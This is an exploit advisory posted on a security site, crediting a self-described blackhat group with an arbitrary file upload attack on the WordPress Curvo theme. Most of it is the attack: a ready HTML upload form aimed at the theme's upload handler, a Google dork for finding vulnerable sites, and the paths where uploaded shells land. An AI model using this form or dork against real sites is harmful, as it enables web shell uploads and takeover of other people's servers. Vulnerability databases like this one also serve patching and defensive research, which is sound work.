WordPress Curvo Shell Upload

2013.10.30
Credit: Byakuya
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

################################################################################################### #_________ .___ _______ ___. .__ #\_ ___ \ ____ __| _/____ \ \ ______ _ _\_ |__ |__| ____ #/ \ \/ / _ \ / __ |/ __ \ / | \_/ __ \ \/ \/ /| __ \| |/ __ \ #\ \___( <_> ) /_/ \ ___/ / | \ ___/\ / | \_\ \ \ ___/ # \______ /\____/\____ |\___ > \____|__ /\___ >\/\_/ |___ /__|\___ > # \/ \/ \/ \/ \/ \/ \/ ################################################################################################### # Exploit Title: WordPress Curvo Themes Arbitrary File Upload Vulnerability # Author: Byakuya # Date: 10/28/2013 # Vendor Homepage: http://themeforest.net/ # Themes Link: http://www.wphub.com/themes/curvo-by-themeforest/ # Price: $35 # Affected Version: Unknown # Infected File: upload_handler.php # Category: webapps/php # Google dork: inurl:/wp-content/themes/curvo/ ################################################################################################### # Exploit & POC : <form enctype="multipart/form-data" action="http://127.0.0.1/wordpress/wp-content/themes/curvo/functions/upload-handler.php" method="post"> <input type="jpg" name="url" value="./" /><br /> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> #File path: http://site.com/wordpress/wp-content/uploads/[FILE] or http://site.com/wordpress/wp-content/uploads/[year]/[month]/[FILE] #Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Official Code-Newbie #Facebook: https://www.facebook.com/CodeNewbieCrew #Website: http://www.codenewbie.net #Malaysia & Indonesia BlackHat ###################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top